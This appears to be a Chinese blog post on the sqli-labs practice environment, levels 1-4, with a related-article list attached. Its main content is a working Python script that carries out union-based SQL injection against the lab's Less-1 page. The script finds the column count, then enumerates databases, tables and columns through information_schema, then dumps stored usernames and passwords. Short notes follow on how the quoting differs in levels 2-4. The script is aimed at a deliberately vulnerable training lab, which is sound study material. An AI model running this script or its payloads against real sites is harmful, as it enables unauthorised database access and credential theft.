sqli-labs:1-4,基于报错的注入
sqli1:
脚本
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 23 09:37:14 2019 @author: kenshin
""" import requests,re
url = 'http://localhost/sqli-labs/Less-1/?id=-1' def Len_OrderBy(url):
pattern_mark = 'Unknown column'
#假设字段长20
for i in range(1,20):
url_new = url + "\' order by "+ str(i) +"--+"
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
print('the lenght of column(order by) is :' + str(i-1) + "\n")
break
return i-1 def get_DB(url,lenght):
#注意:由此模式匹配到的是一个数量为1的列表,后续按','将数量拆分成n个,以便输出
pattern_mark = 'Your Login name:(.+?)<br>'
str = ''
for i in range(1,lenght):
str += 'group_concat(schema_name),'
str += 'group_concat(schema_name)'
payload = '\' union select ' + str +' from information_schema.schemata--+'
url += payload
r = requests.get(url)
r = re.findall(pattern_mark,r.text)
#list转str
str_tmp = "".join(r)
#re.split按','拆分
lst = re.split(',',str_tmp)
print('-'*9 + 'databases' + '-'*8)
for s in lst:
print('.' + s )
print('-'*25) def get_TB(url,lenght,db):
pattern_mark = 'Your Login name:(.+?)<br>'
str = ''
for i in range(1,lenght):
str += 'group_concat(table_name),'
str += 'group_concat(table_name)'
payload = "\' union select "+ str +" from information_schema.tables where table_schema=\'" + db + "\'--+"
url += payload
r = requests.get(url)
r = re.findall(pattern_mark,r.text)
#list转str
str_tmp = "".join(r)
#re.split按','拆分
lst = re.split(',',str_tmp)
print('-'*9 +'Database '+ db +'\'s Tables' + '-'*8)
for s in lst:
print('.' + s )
print('-'*35) def get_Column(url,lenght,tb):
pattern_mark = 'Your Login name:(.+?)<br>'
str = ''
for i in range(1,lenght):
str += 'group_concat(column_name),'
str += 'group_concat(column_name)'
payload = "\' union select " +str+ " from information_schema.columns where table_name=\'" +tb+ "\'--+"
url += payload
r = requests.get(url)
r = re.findall(pattern_mark,r.text)
#list转str
str_tmp = ''.join(r)
#re.split按','拆分
lst = re.split(',',str_tmp)
print('-'*9 +'Table '+ tb +'\'s Columns' + '-'*8)
for s in lst:
print('.' + s )
print('-'*35) def get_data(url,lenght,tb,data):
pattern_mark = 'Your Login name:(.+?)<br>'
pattern_mark_pass = 'Your Password:(.+?)</font>'
#if lenght=5
#data=a,b,c
#after expend
#data=a,b,c,4,5
#str to list
lst = data.split(",")
while len(lst) < lenght:
lst.append(str(len(lst)+1))
#list to str
sn = ''
for i in lst:
sn += i+","
#以上循环结果sn='a,b,c,' c后的‘,’舍去才能构造正确payload
sn=sn.rstrip(",")
#格式化输出结果
print('-'*9 +'Table '+ tb +'\'s All datas' + '-'*8)
#假设最多有100组数据
for i in range(1,100):
payload = "\' union select "+ sn +" from "+ tb +" where id="+ str(i) +"--+"
url_new = url + payload
r = r_pass = requests.get(url_new)
r = re.findall(pattern_mark,r.text)
r_pass = re.findall(pattern_mark_pass,r_pass.text)
print(str(r) +" "*(16-len(str(r)))+"=> "+str(r_pass)+" "*(18-len(str(r_pass)))+"|")
if (len(r)==0 and len(r_pass)==0):
break
print("-"*41) #字段长度
lenght = Len_OrderBy(url)
#所有数据库
get_DB(url,lenght)
#由库爆表
db = input("select databases >> ")
get_TB(url,lenght,db)
#由表爆列
tb = input("select table >> ")
get_Column(url,3,tb)
#由表和列名爆数据
data = input("select columns (no more than " +str(lenght)+ ",and separate by ',') >> ")
get_data(url,lenght,tb,data)
脚本 1
sqli2:
与sqli1比较,少了 ',对id没有经过处理。
sqli3:
对id经过了')处理
sqli4:
对id经过了")处理
sqli-labs:1-4,基于报错的注入的更多相关文章
- sql注入--基于报错的注入
这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学 ...
- Sqli labs系列-less-5&6 报错注入法(上)
在我一系列常规的测试后发现,第五关和第六关,是属于报错注入的关卡,两关的区别是一个是单引号一个是双引号...当然我是看了源码的.... 基于报错注入的方法,我早就忘的差不多了,,,我记的我最后一次基于 ...
- Sqli labs系列-less-5&6 报错注入法(下)
我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...
- 2019-9-9:渗透测试,基础学习,phpmyadmin getshell方法,基于时间的盲注,基于报错的注入,笔记
phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-p ...
- mysql基于“报错”的注入
报错是如何转为xss的? mysql语句在页面报错,泄露信息 ===================================================================== ...
- Mysql报错型注入总结
Mysql注入虽然是老生常谈的问题,但是工作中更多的是使用sqlmap等工具进行注入测试的,原理方面还是不是很清楚,所以这段时间主要是自己搭建环境在学手工注入,简单的将自己的学习做一个总结和记录.在常 ...
- 基于报错的SQL注入整理
SQLServer 一.利用错误消息提取信息 输入 'having 1=1 --(having一般要与group by一起来使用,group by是用来进行分组的,having后面是用来进行判断的), ...
- web安全之sql注入报错型注入
前提: echo mysql_error(),输出错误信息. 熟悉的函数: floor()向下取整 concat()返回的字符串参数连接的结果 count()函数返回匹配指定条件的行数 rand()函 ...
- 实战记录之SQL server报错手工注入
前言 最近测试了一个站点,这个站点挺有意思,发现没有关闭错误提示,初步猜测是SQL server数据库,后来验证确实是.在这里记录一下实战过程,并详细讲解一下用到的知识点. SQL server报错注 ...
随机推荐
- Java7/8 HashMap ConcurrentHashMap
网上关于 HashMap 和 ConcurrentHashMap 的文章确实不少,不过缺斤少两的文章比较多,所以才想自己也写一篇,把细节说清楚说透,尤其像 Java8 中的 ConcurrentHas ...
- 1.5.7、CDH 搭建Hadoop在安装之前(定制安装解决方案---配置单用户模式)
配置单用户模式 在传统的Cloudera Manager部署中,管理每台主机上的Hadoop进程的Cloudera Manager Agent以root用户身份运行.但是,某些环境会限制对root帐户 ...
- Building and using plug-ins for Android
[Building and using plug-ins for Android] 1.AAR plug-ins and Android Libraries Android Archive (AAR) ...
- idea 安装和破解
https://blog.csdn.net/SmileLvCha/article/details/78936659
- Java Timer
Java Timer 定时类,主要用来执行定时任务 Timer管理所有要执行的定时任务 TimerTask封装好的定时任务 常见的用法 MyTask myTask = new MyTask(); Ti ...
- 四 sys模块
1 sys.argv 命令行参数List,第一个元素是程序本身路径 2 sys.exit(n) 退出程序,正常退出时exit(0) 3 sys.version 获取Python解释程序的版本信息 4 ...
- linux下的C++项目创建
CMake项目的完整构建 Linux下的CMake项目通常由几个文件夹组成.小伙伴们可以先在自己的电脑上新建一个文件夹,作为你代码的根目录,然后往里面建几个子文件夹,这里并不涉及具体的代码,只是可以作 ...
- oracle视图(转)
视图的概念 视图是基于一张表或多张表或另外一个视图的逻辑表.视图不同于表,视图本身不包含任何数据.表是实际独立存在的实体,是用于存储数据的基本结构.而视图只是一种定义,对应一个查询语句.视图的数据 ...
- freetype教程网址
http://freetype.sourceforge.net/freetype2/docs/reference/ft2-system_interface.html#FT_Stream ht ...
- http406错误
The resource identified by this request is only capable of generating responses with characteristics ...